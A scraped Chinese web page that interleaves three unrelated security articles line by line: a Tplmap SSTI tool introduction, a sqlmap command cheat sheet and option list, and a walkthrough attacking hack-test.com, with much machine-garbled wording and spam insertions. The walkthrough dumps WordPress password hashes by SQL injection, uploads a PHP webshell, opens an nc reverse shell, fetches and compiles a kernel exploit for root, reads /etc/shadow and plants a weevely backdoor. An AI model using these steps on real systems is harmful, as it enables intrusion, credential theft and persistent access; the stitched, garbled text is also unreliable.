原标题:Tplmap – 扫描服务器端模板注入漏洞的开源工具

 

一、查询数据

只要黑客要侵略的你的网址域名叫:hack-test.com

Tplmap是二个python工具,能够透过选用沙箱转义技艺找到代码注入和服务器端模板注入(SSTI)漏洞。该工具能够在多数模板引擎中央银行使SSTI来访问目的文件或操作系统。一些接受帮衬助的沙盘引擎包含PHP(代码评估),Ruby(代码评估),Jave(代码评估),Python(代码评估),ERB,Jinja二和Tornado。该工具得以实行对那些模板引擎的盲注入,并持有施行远程命令的力量。

Sqlmap:

  • 一般注入流程:
  • sqlmap -u “www.ONDragon.com/ONDragon?id=1” –dbs   查看全部数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u “www.ONDragon.com/?ONDragon=1”

  • –data (post型注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –data=”user=admin&pass=pass”
    sqlmap -r requests.txt 读取http包进行机动post注入(也得以进去http底部的即兴地方注入,只要在注入地点投入 * 即可)
    sqlmap “www.ONDragon.com” –forms

  • –coockie (cookie注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –cookie=”user=admin&pass=pass” –level 2 (level 大于2就行)

  • –batch
    (自动选拔sqlmap私下认可选项)

  • -p  (参数采取)

    sqlmap -u “www.ONDragon.com” –forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url”
/*-u为健康扫描参数*/

sqlmap.py -u “url” –tables
/*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T
“要拆的表名”/*列出钦命表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C
“要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*环顾注入点*/

sqlmap.py -u “url” –dbs
/*列出全体数据库*/

sqlmap.py -u “url” –current-db
/*列出当下数据库*/

sqlmap.py -u “url” –current-user
/*列出近期用户*/

sqlmap.py -u “url” –tables -D
“当前数码库名” /*拆除与搬迁当前数据库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数据库名” /*拆迁内定表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*环顾注入点*/

sqlmap.py -u “url” –dbs
/*列出装有数据库*/

sqlmap.py -u “url” –current-db
/*列出最近数据库*/

sqlmap.py -u “url” –current-user
/*列出当下用户*/

sqlmap.py -u “url” –tables -D
“当前数码库名” /*拆解当前数据库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前多少库名” /*拆解钦定表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

SQLSELX570VEBMWX伍操作和MYSQL是同1的!!!常见的两种数据库!!!

4.COOKIE注入:

sqlmap.py -u
“www.xxx.com/asp可能www.xxx.com/php” –cookie “参数名如id=壹” –level
2/*level为提高权限*/

怎样数据库就依照下面的数据库加上cookie语句拆解就行了

5.POST注入:

抓包保存到SQLMAP目录下.txt的文本然后输入指令sqlmap.py
-r xxx.txt /*xxx.txt为保存包文件的文件名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user”
/*执行net user命令*/

sqlmap.py -u “url” –os-shell
/*系统互相的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs
/*xxx.txt内容为HTTP请求*/

八.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

sqlmap.py -u “url” –tamper=”xxx.py”

有关tamper脚本详细表达在本博客中有,链接为:

玖.将注入语句插入到内定地点:

sqlmap.py -u
“url(www.xxx.com/id/1*.html)” –dbs

有点网址是行使伪静态的页面使用SQLMAP的平常注入是卓殊的,所以SQLMAP提供了”*”参数将SQL语句插入钦命地点,一般用来伪静态注入。

在选择HTTP注入时采用-r参数也能够间接在文件中加多*号

10.延时注入:

sqlmap –dbs -u “url” –delay 0.5
/*延时0.5秒*/

流入神器sqlmap,扫描服务器端模板注入漏洞的开源工具。sqlmap –dbs -u “url” –safe-freq
/*请求2次*/

1一.选择谷歌(Google)语法寻找注入(谷歌(Google)hack):

sqlmap.py -g “inurl:asp?id=1”
/*””内为寻觅语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 呈现程序的版本号并脱离

-h, –help 呈现此扶助音讯并脱离

-v VERAV肆URBANEARS 详细品级:0-6(私下认可为①)

Target(目标):

以下至少需求安装当中一个增选,设置目的U景逸SUVL。

-d DIRECT 直接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST
从Burp或WebScarab代理的日志中分析目的。

-r REQUESTFILE
从多个文本中载入HTTP请求。

-g GOOGLEDOOdysseyK 处理Googledork的结果作为靶子UMuranoL。

-c CONFIGFILE
从INI配置文件中加载选项。

Request(请求):

这一个采纳能够用来钦命怎么着连接到目的UBMWX3L。

–data=DATA 通过POST发送的数目字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode UXC60L
编码生成的cookie注入

–drop-set-cookie 忽略响应的Set –
Cookie头新闻

–user-agent=AGENT 指定 HTTP User –
Agent头

–random-agent 使用随机选定的HTTP User –
Agent头

–referer=REFERER 指定 HTTP
Referer头

–headers=HEADE奥德赛S
换行分开,加入别的的HTTP头

–auth-type=ATYPE
HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)

–auth-cred=ACRED
HTTP身份验证凭据(用户名:密码)

–auth-cert=ACERT
HTTP认证证书(key_file,cert_file)

–proxy=PROXY
使用HTTP代理连接到对象UPAJEROL

–proxy-cred=PCRED
HTTP代理身份验证凭据(用户名:密码)

–ignore-proxy 忽略系统暗中同意的HTTP代理

–delay=DELAY
在种种HTTP请求之间的延迟时间,单位为秒

–timeout=TIMEOUT
等待连接超时的时刻(默以为30秒)

–retries=RETLANDIES
连接超时后再行连接的光阴(私下认可三)

–scope=SCOPE
从所提供的代理日志中过滤器指标的正则表明式

–safe-url=SAFUPAJEROL
在测试进程中不时访问的url地址

–safe-freq=SAFREQ
一回访问之间测试请求,给出安全的UENCOREL

Optimization(优化):

这个选用可用于优化SqlMap的质量。

-o 开启全数优化按键

–predict-output 预测常见的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection
从未有实际的HTTP响应体中检索页面长度

–threads=THREADS
最大的HTTP(S)请求并发量(默感觉1)

Injection(注入):

这个采纳能够用来内定测试哪些参数,
提供自定义的流入payloads和可选篡改脚本。

-p TESTPARAMETEGL450 可测试的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS
强制后端的DBMS操作系统为这么些值

–prefix=PREFIX
注入payload字符串前缀

–suffix=SUFFIX
注入payload字符串后缀

–tamper=TAMPELAND使用给定的剧本(S)篡改注入数据

Detection(检测):

这一个选拔能够用来内定在SQL盲注时怎么样分析和相比HTTP响应页面包车型客车始末。

–level=LEVEL
推行测试的级差(一-伍,默以为一)

–risk=CR-VISK
实施测试的风险(0-三,默感觉一)

–string=ST索罗德ING
查询时有效时在页面相称字符串

–regexp=REGEXP
查询时有效时在页面相称正则表明式

–text-only 仅遵照在文书内容比较网页

Techniques(技巧):

这几个接纳可用以调整具体的SQL注入测试。

–technique=TECH
SQL注入技艺测试(暗中认可BEUST)

–time-sec=TIMESEC
DBMS响应的延迟时间(默以为5秒)

–union-cols=UCOLS
定列范围用于测试UNION查询注入

–union-char=UCHA君越用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint
实践检查普及的DBMS版本指纹

Enumeration(枚举):

那个接纳能够用来列举后端数据库管理种类的音讯、表中的布局和数据。其余,您仍是能够运作您本身

的SQL语句。

-b, –banner
检索数据库管理体系的标记

–current-user
检索数据库管理连串当下用户

–current-db
检索数据库管理种类当下数据库

–is-dba 检验DBMS当前用户是不是DBA

–users 枚举数据库管理连串用户

–passwords
枚举数据库管理连串用户密码哈希

–privileges
枚举数据库管理体系用户的权限

–roles 枚举数据库管理种类用户的剧中人物

–dbs 枚举数据库管理类别数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump
转储数据库管理连串的数据库中的表项

–dump-all
转储全数的DBMS数据库表中的条规

–search
搜索列(S),表(S)和/或数据库名称(S)

-D DB 要开始展览枚举的数码库名

-T TBL 要进行枚举的多少库表

-C COL 要拓展枚举的数据库列

-U USEMurano 用来拓展枚举的数据库用户

–exclude-sysdbs
枚举表时排除系统数据库

–start=LIMITSTART
第叁个查询输出进入检索

–stop=LIMITSTOP
最终查询的出口进入检索

–first=FIPRADOSTCHA大切诺基第三个查询输出字的字符检索

–last=LASTCHA奥德赛最终查询的输出字字符检索

–sql-query=QUE途锐Y 要推行的SQL语句

–sql-shell 提醒交互式SQL的shell

Brute force(蛮力):

那一个选拔能够被用来运行蛮力检查。

–common-tables 检查存在共同表

–common-columns 检查存在共同列

User-defined function
injection(用户自定义函数注入):

那么些选择能够用来成立用户自定义函数。

–udf-inject 注入用户自定义函数

–shared-lib=SHLIB 共享库的本土路线

File system
access(访问文件系统):

这个选用能够被用来访问后端数据库管理类别的最底层文件系统。

–file-read=RAV4FILE
从后端的数据库管理系统文件系统读取文件

–file-write=WFILE
编辑后端的数据库管理系统文件系统上的地头文件

–file-dest=DFILE
后端的数据库管理种类写入文件的相对路线

Operating system
access(操作系统访问):

这么些选取能够用于访问后端数据库管理种类的平底操作系统。

 

–os-cmd=OSCMD 实施操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取一个OOB
shell,meterpreter或VNC

–os-smbrelay 一键获取2个OOB
shell,meterpreter或VNC

–os-bof 存款和储蓄进程缓冲区溢出利用

–priv-esc 数据库进度用户权限进步

–msf-path=MSFPATH Metasploit Framework本地的装置路线

–tmp-path=TMPPATH
远程暂且文件目录的相对路线

Windows注册表访问:

那几个选取能够被用于访问后端数据库管理种类Windows注册表。

–reg-read 读三个Windows注册表项值

–reg-add
写三个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA
Windows登记表键值多少

–reg-type=REGTYPE
Windows注册表项值类型

General(一般):

那些选取能够用来设置有个别1般的行事参数。

-t TRAFFICFILE
记录全部HTTP流量到二个文书文件中

-s SESSIONFILE
保存和还原检索会话文件的保有数据

–flush-session
刷新当前目的的对话文件

–fresh-queries
忽略在对话文件中存款和储蓄的查询结果

–eta 彰显各样输出的揣测到达时刻

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch
从不询问用户输入,使用全部暗许配置。

Miscellaneous(杂项):

–beep 发现SQL注入时提醒

–check-payload
IDS对流入payloads的检查测试测试

–cleanup
SqlMap具体的UDF和表清理DBMS

–forms 对目的U卡宴L的解析和测试方式

–gpage=GOOGLEPAGE
从钦定的页码使用谷歌(谷歌)dork结果

–page-rank 谷歌(Google)dork结果彰显网页排行(P纳瓦拉)

–parse-errors
从响应页面解析数据库管理连串的谬误音信

–replicate
复制转储的数量到三个sqlite三数据库

–tor 使用暗中认可的Tor(比达尔ia/ Privoxy/
Polipo)代理地址

–wizard 给初级用户的简便向导分界面

./sqlmap.py -u “ sqlmap
提示 do you want to include all tests for ‘Microsoft SQL Server’
extending provided level (1) and risk (1)? [Y/n]  选 y

让大家用ping命令获取网址服务器的IP地址.

安装Tplmap

提醒参数 id 有尾巴,是还是不是要保持其余测试,按 y 回车明确 GET parameter ‘id’
is vulnerable. Do you want to keep testing the others (if any)? [y/N]

 

金沙网址 1

获得具备数据库名 因为早已知道数据库名称为微软的 sql
server,为了加速检查实验速度,钦赐数据库参数 –dbms=mssql ./sqlmap.py -u
“” –dbms=mssql –dbs

今昔我们收获了网址服务器的IP地址为:173.23陆.13八.1一三

能够通过使用以下github链接从github存款和储蓄Cook隆该工具来设置Tplmap。

脚下网页连接数据库名 ./sqlmap.py -u
“” –dbms=mssql
–current-db

研究一样服务器上的别的网址,我们选取sameip.org.

git clone

点名数据库全数表 ./sqlmap.py -u
“” –dbms=mssql –table
-D “testdb”

 

打响安装后,将引得路线改变为tplmap安装文件以运营tplmap.py。

读取钦赐表中的字段名 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –columns

26 sites hosted on IP Address 173.236.138.113

测试Web应用程序中的漏洞

读取内定字段内容 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –dump -C “username,password”

ID

Domain

Site Link

1

hijackthisforum.com

hijackthisforum.com

2

sportforum.net

sportforum.net

3

freeonlinesudoku.net

freeonlinesudoku.net

4

cosplayhell.com

cosplayhell.com

5

videogamenews.org

videogamenews.org

6

gametour.com

gametour.com

7

qualitypetsitting.net

qualitypetsitting.net

8

brendanichols.com

brendanichols.com

9

8ez.com

8ez.com

10

hack-test.com

hack-test.com

11

kisax.com

kisax.com

12

paisans.com

paisans.com

13

mghz.com

mghz.com

14

debateful.com

debateful.com

15

jazzygoodtimes.com

jazzygoodtimes.com

16

fruny.com

fruny.com

17

vbum.com

vbum.com

18

wuckie.com

wuckie.com

19

force5inc.com

force5inc.com

20

virushero.com

virushero.com

21

twincitiesbusinesspeernetwork.com

twincitiesbusinesspeernetwork.com

22

jennieko.com

jennieko.com

23

davereedy.com

davereedy.com

24

joygarrido.com

joygarrido.com

25

prismapp.com

prismapp.com

26

utiligolf.com

utiligolf.com

Tplmap不仅选择了文件系统的尾巴,而且还持有应用分化参数访问底层操作系统的力量。以下荧屏截图呈现了可用以访问操作系统的两样参数选项

二、推行系统命令

17叁.236.13捌.1一3上有二几个网站,繁多黑客为了夺回你的网站可能会检查同服务器上的此外网址,可是本次是以商讨为目的,大家将抛开服务器上的别的网址,只针对你的网址来进展入侵检查评定。

金沙网址 2

./sqlmap.py -u “”
–dbms=mssql –os-shell –threads=10

We’ll need more information about your site, such as:

以下命令可用来测试对象U奔驰G级L中的易受攻击的参数。

三、常见参数

我们须要有关您网址的以下音讯:

./tplmap.py -u <‘指标网站’>

流入点 HTTP 钦命请求方法检查实验 POST
–data=”password=8895263四&rem=on&username=8895263四”

  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)

施行该命令后,该工具会针对多少个插件测试指标ULANDL以搜寻代码注入机会。

Cookie –cookie “cookie value” 登陆检查实验

让大家开端找你网址的DNS记录,大家用who.is来成功这一目的.

金沙网址 3

流入查询数据手艺 –technique=U  钦赐 Union 能力

 

假定发现漏洞,该工具将出口有关指标中恐怕注入点的详细新闻。这么些归纳GET参数值(无论是id依然名称),模板引擎(例如Tornado),OS(例如Linux)和注入技能(例如渲染,盲)。

流入 HTTP 全数办法注入检测 –level3  检查实验 HTTP
方法深度,GET、POST、Cookie、User-agent 和 Referer

大家发现你的DNS记录如下

金沙网址 4

Base64 编码 url 注入点 sqlmap -u
–tamper
base64encode.py

 

对于易受攻击的目的操作系统,能够应用前面提到的中间二个参数重国民党的新生活运动行tplmap命令。例如,大家能够透过以下方式将-os
-shell选项与tplmap命令一齐行使。

检查实验 DBMS 当前用户是或不是 DBA(注入点试行操作系统命令一般供给 DBA 权限)
–is-dba

让大家来规定web服务器的品类

./tplmap.py –os-shell -u <‘指标网站’>

没有询问用户输入,使用具备暗中同意配置 –batch

 

-os -shell选项在对象操作系统上运营伪终端以实行所需的代码。

暗许最大线程数为 拾 –threads=10

意识你的W eb服务器是apache,接下去分明它的版本.

小说出处:latesthackingnews再次回到今日头条,查看越来越多

  1. #HiRoot’s Blog  

HACK-TEST.COM SITE INFORMATION

主编:

 2. Options(选项):  

IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7

 叁. –version 展现程序的版本号并退出 

接下去是时候搜索你网址域名的登记新闻,你的电话机、邮箱、地址等.

 四. -h, –help 显示此补助音信并脱离

 

  伍. -v VE陆风X8魔声 详细品级:0-6(默感觉 一)

大家以往曾经获得了您的网址域名的注册音信,包涵你的主要音讯等.我们得以因此backtrack 第55中学的whatweb来赢得你的网站服务器操作系统类型和服务器的版本.

6.    7. Target(目标): 

 

 捌. 以下至少需求设置个中二个抉择,设置目标 U昂CoraL。

 

9.   

咱俩发现你的网址使用了老牌的php整站程序wordpress,服务器的的类别项目为Fedora Linux,Web服务器版本Apache 二.二.一伍.延续查看网址服务器开放的端口,用渗透测试工具nmap:

 拾. -d DIRECT 直接连接到数据库。 

壹-Find services that run on server(查看服务器上运营的劳务)

 11. -u URL, –url=URL 目标 URL。 

贰-Find server OS(查看操作系统版本)

 1贰. -l LIST 从 Burp 或 WebScarab 代理的日记中剖析目的。

唯有80端口是开放的,操作系统是Linux2.⑥.2二(Fedora Core 六),未来大家早已征集了富有有关您网站的主要性音讯, 接下来早先扫描搜索漏洞,比如:

  壹三. -r REQUESTFILE 从三个文本中载入 HTTP 请求。 

Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF 等等.

 1肆. -g GOOGLEDO途锐K 处理 谷歌 dork 的结果作为靶子 U逍客L。

大家将选取Nikto来收罗漏洞音信:

  一伍. -c CONFIGFILE 从 INI 配置文件中加载选项。

root@bt:/pentest/web/nikto# perl nikto.pl -h hack-test.com

16.    

我们也会用到Backtrack 伍 PRADO第11中学的W三AF 工具:

  1. Request(请求)

  2. 这一个选取能够用来钦点怎样连接到对象 U奥迪Q7L。

root@bt:/pentest/web/w3af# ./w3af_gui

19.   

 

 20. –data=DATA 通过 POST 发送的多少字符串  

咱俩输入要检查实验的网址地址,选取完整的海东审计选项.

  1. –cookie=COOKIE HTTP Cookie 头 

 

 2二. –cookie-urlencode U福睿斯L 编码生成的 cookie 注入 

稍等一会,你将会看出扫描结果.

 二三. –drop-set-cookie 忽略响应的 Set – Cookie 头信息 

 

 24. –user-agent=AGENT 指定 HTTP User – Agent 头 

发现你的网址存在sql注入漏洞、XSS漏洞、以及任何的漏洞.让大家来探寻SQL注入漏洞.

 25. –random-agent 使用随机选定的 HTTP User – Agent 头

%27z%220

  26. –referer=REFERER 指定 HTTP Referer 头  

大家经过工具发现那几个U昂科拉L存在SQL注入,大家透过Sqlmap来检查测试这么些url.

  1. –headers=HEADE帕杰罗S 换行分开,参预别的的 HTTP 头

Using sqlmap with –u url

  2捌. –auth-type=ATYPE HTTP 身份验证类型(基本,摘要或 NTLM)

金沙网址, 

(Basic, Digest or NTLM) 

过1会你会看出

 2九. –auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)

 

  30. –auth-cert=ACERT HTTP 认证证书(key_file,cert_file)

输入N按回车键继续

  3一. –proxy=PROXY 使用 HTTP 代理连接到目的 U帕杰罗L

 

  1. –proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码) 

大家发现你的网址存在mysql显错注入,mysql数据库版本是五.0. 我们透过投入参数”-dbs”来品尝搜集数据库名.

 33. –ignore-proxy 忽略系统暗中同意的 HTTP 代理 

 

 3四. –delay=DELAY 在每一种 HTTP 请求之间的延迟时间,单位为秒 

 

 3伍. –timeout=TIMEOUT 等待连接超时的光阴(默以为 30 秒) 

发现四个数据库,接下去通过参数”-D wordpress -tables”来查看wordpress数据库的具备表名

 3陆. –retries=RET普拉多IES 连接超时后再一次连接的时间(暗中认可 3)

 

  三柒. –scope=SCOPE 从所提供的代理日志中过滤器指标的正则表达式 

 

 3八. –safe-url=SAFU福特ExplorerL 在测试过程中日常访问的 url 地址  

由此参数“-T wp_users –columns
”来查看wp_users表中的字段.

  1. –safe-freq=SAFREQ 三次访问之间测试请求,给出安全的 U途观L

 

40.    41. Optimization(优化):

 

  4贰. 这个选拔可用于优化 SqlMap 的习性。

接下去猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass –dump”

43.   

 

 4四. -o 开启全部优化开关  

我们会意识用户名和密码hashes值.
大家需求经过以下在线破解网址来破解密码hashes

 45. –predict-output 预测常见的查询输出

  46. –keep-alive 使用持久的 HTTP(S)连接 

 

 四7. –null-connection 从不曾实际的 HTTP 响应体中寻觅页面长度 

登陆wordpress的后台wp-admin

 4捌. –threads=THREADS 最大的 HTTP(S)请求并发量(默许为 一)

品尝上传php webshell到服务器,以有利于运转1些linux命令.在插件页面找寻别的可以编写的插件. 我们选取Textile那款插件,编辑插入大家的php webshell,点击更新文件,然后访问我们的php webshell.

49.    50. Injection(注入):  

 

 5一. 这个选取能够用来内定测试哪些参数, 提供自定义的注入 payloads
和可选篡改脚 本。

Php webshell被分析了,大家得以决定你网址的文书,不过大家只期待获得网址服务器的root权限,来侵袭服务器上任何的网站。

52.   

我们用NC来反弹二个shell,首先在我们的微型计算机上监听5555端口.

 伍3. -p TESTPARAMETE大切诺基 可测试的参数(S)  

 

  1. –dbms=DBMS 强制后端的 DBMS 为此值 

接下来在Php webshell上反向连接我们的Computer,输入你的IP和端口5555.

 55. –os=OS 强制后端的 DBMS 操作系统为这一个值

点击连接大家会看出

  1. –prefix=PREFIX 注入 payload 字符串前缀 

接下去大家品尝实行一些限令:

 伍七. –suffix=SUFFIX 注入 payload 字符串后缀  

id

  1. –tamper=TAMPE汉兰达 使用给定的台本(S)篡改注入数据

uid=48(apache) gid=489(apache) groups=489(apache)
(用来显示用户的id和组)

59.    60. Detection(检测): 

pwd

 6一. 那些选用能够用来钦赐在 SQL 盲注时怎样分析和相比较 HTTP
响应页面包车型客车内容。

/var/www/html/Hackademic_RTB1/wp-content/plugins
(展现服务器上如今的渠道)

62.   

uname -a

 陆三. –level=LEVEL 实行测试的品级(一-5,默以为 一)

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45
EST 2009 i686 i686 i386 GNU/Linux
(展现内核版本音信)

  6四. –risk=QashqaiISK 实践测试的高危害(0-3,默以为 一)

 

 65. –string=STENCOREING 查询时有效时在页面相称字符串

近期大家明白,服务器的水源版本是二.6.31.伍-1二七.fc1贰.1686,大家在exploit-db.com中搜寻此版本的相干漏洞.
在服务器上测试了大多exp之后,大家用以下的exp来提高权限.

  1. –regexp=REGEXP 查询时有效时在页面般配正则说明式 

大家在nc shell上进行以下命令:
wget -o roro.c
(下载exp到服务器同等对待命名叫roro.c)
注:诸多linux内核的exp都以C语言开荒的,因而大家保留为.c扩展名.
exp roro.c代码如下:

 6七. –text-only 仅根据在文书内容比较网页

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0)
{
printf(“[*] Could not open socket.\n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));
透过以上代码我们发现该exp是C语言开拓的,我们须求将他编写翻译成elf格式的,命令如下:

68.    69. Techniques(技巧):  

gcc roro.c –o roro

 70. 这几个选取可用来调控具体的 SQL 注入测试。

接下去推行编写翻译好的exp

7壹.    72. –technique=TECH SQL 注入技能测试(暗中认可 BEUST) 

./roro

 73. –time-sec=TIMESEC DBMS 响应的延迟时间(默感觉 5 秒) 

实践到位之后大家输入id命令

 7四. –union-cols=UCOLS 定列范围用于测试 UNION 查询注入  

id

  1. –union-char=UCHA汉兰达 用于暴力猜解列数的字符

小编们发现大家早已是root权限了

76.    77. Fingerprint(指纹): 

uid=0(root) gid=0(root)

 7捌. -f, –fingerprint 实践检查普及的 DBMS 版本指纹

近日大家得以查看/etc/shadow文件
cat /etc/shadow

79.    80. Enumeration(枚举):

查看/etc/passwd 文件

  八1.
这么些采用能够用来列举后端数据库管理种类的音讯、表中的布局和数码。其余,您
还是能运营您自身

cat /etc/passwd

  1. 的 SQL 语句。 

我们能够行使”john the
ripper”工具破解全数用户的密码.可是我们不会那样做,我们需求在这些服务器上预留后门以福利大家在其余时候访问它.

 83. -b, –banner 检索数据库管理类别的标记 

大家用weevely制作叁个php小立刻传到服务器上.

 八4. –current-user 检索数据库管理体系当下用户 

一.weevely行使选取
root@bt:/pentest/backdoors/web/weevely# ./main.py –

 8伍. –current-db 检索数据库管理种类当下数量库 

 

 八陆. –is-dba 检查测试 DBMS 当前用户是还是不是 DBA 

二.用weevely成立三个密码为koko的php后门

 8柒. –users 枚举数据库管理种类用户

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p
koko

  88. –passwords 枚举数据库管理系列用户密码哈希 

 

 89. –privileges 枚举数据库管理种类用户的权能 

接下去上盛传服务器之后来选用它
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u
-p
koko

 90. –roles 枚举数据库管理连串用户的剧中人物 

测试我们的hax.php后门

 玖一. –dbs 枚举数据库管理种类数据库  

 

 九二. –tables 枚举的 DBMS 数据库中的表 

总结:

 玖3. –columns 枚举 DBMS 数据库表列 

在那边小说中大家学到的有个别技艺正被黑客用来凌犯你的网址和服务器,大家期待能由此这篇小说可以对您今后爱护服务器和网址安全全体帮忙.

 九四. –dump 转储数据库管理连串的数据库中的表项  

本文只是用来学学驾驭Web安全的相干文化,原著链接:

  1. –dump-all 转储全部的 DBMS 数据库表中的条目 

 ⑨陆. –search 找寻列(S),表(S)和/或数据库名称(S)

 

  玖柒. -D DB 要拓展枚举的数据库名  

 九八. -T TBL 要开始展览枚举的数据库表  

 9玖. -C COL 要实行枚举的数据库列

  1. -U USE奥迪Q5 用来进展枚举的数据库用户  

  2. –exclude-sysdbs 枚举表时排除系统数据库  

  3. –start=LIMITSTART 第二个查询输出进入检索  

  4. –stop=LIMITSTOP 最后查询的出口进入检索  

  5. –first=FITucsonSTCHASportage 先是个查询输出字的字符检索  

  6. –last=LASTCHA奥迪Q3 最后查询的输出字字符检索  

 拾陆. –sql-query=QUEBMWX三Y 要推行的 SQL 语句 

 拾七. –sql-shell 提示交互式 SQL 的 shell

108.    109. Brute force(蛮力):  

 110. 这几个接纳能够被用来运营蛮力检查。

11一.    112. –common-tables 检查存在共同表  

 11三. –common-columns 检查存在共同列

11四.    115. User-defined function injection(用户自定义函数注入):

  1. 那一个选取能够用来创立用户自定义函数。

117.    11八. –udf-inject 注入用户自定义函数  

 11九. –shared-lib=SHLIB 共享库的本地路线

120.    1贰一. File system access(访问文件系统): 

 12二. 那些选拔能够被用来访问后端数据库管理种类的最底层文件系统。

1二三.    12四. –file-read=PAJEROFILE 从后端的数据库管理系统文件系统读取文件 

  1. –file-write=WFILE 编辑后端的数据库管理系统文件系统上的当麻芋果件 
  2. –file-dest=DFILE 后端的数据库管理体系写入文件的相对路径

12柒.    12八. Operating system access(操作系统访问): 

 129. 这一个选取能够用来访问后端数据库管理系列的尾巴部分操作系统。

130.    131. –os-cmd=OSCMD 实践操作系统命令  

 132. –os-shell 交互式的操作系统的 shell  

 133. –os-pwn 获取三个 OOB shell,meterpreter 或 VNC  

  1. –os-smbrelay 壹键得到1个 OOB shell,meterpreter 或 VNC

  2. –os-bof 存款和储蓄进程缓冲区溢出利用  

 13陆. –priv-esc 数据库进度用户权限进步  

 一3柒. –msf-path=MSFPATH Metasploit Framework 本地的装置路线  

  1. –tmp-path=TMPPATH 远程一时文件目录的相对路线

13玖.    140. Windows 注册表访问: 

 1四1. 这几个选用能够被用于访问后端数据库管理种类 Windows 注册表。

14贰.    1肆3. –reg-read 读2个 Windows 注册表项值 

  1. –reg-add 写三个 Windows 注册表项值数据  

  2. –reg-del 删除 Windows 注册表键值 

 1四6. –reg-key=REGKEY Windows 注册表键  

  1. –reg-value=REGVAL Windows 注册表项值  

  2. –reg-data=REGDATA Windows 挂号表键值多少  

 149. –reg-type=REGTYPE Windows 注册表项值类型

150.    151. General(一般):

152.    一5三. 那些选取能够用来设置某个貌似的行事参数。 

  1. -t TRAFFICFILE 记录全数 HTTP 流量到2个文本文件中 

 15五. -s SESSIONFILE 保存和死灰复燃检索会话文件的有所数据  

  1. –flush-session 刷新当前目的的对话文件 

 15七. –fresh-queries 忽略在对话文件中贮存的询问结果  

  1. –eta 展现每种输出的预测达到时刻  

 15玖. –update 更新 SqlMap  160. –save file 保存选项到 INI 配置文件 

 1陆1. –batch 从不询问用户输入,使用具备暗中同意配置。

162.    163. Miscellaneous(杂项): 

 164. –beep 发现 SQL 注入时提醒

  165. –check-payload IDS 对流入 payloads 的检查测试测试  

 16陆. –cleanup SqlMap 具体的 UDF 和表清理 DBMS  

  1. –forms 对指标 U途观L 的辨析和测试情势 

 16八. –gpage=GOOGLEPAGE 从钦点的页码使用谷歌 dork 结果  

 16九. –page-rank 谷歌(Google) dork 结果显示网页排行(PLX570)

  1. –parse-errors 从响应页面解析数据库管理连串的不当消息

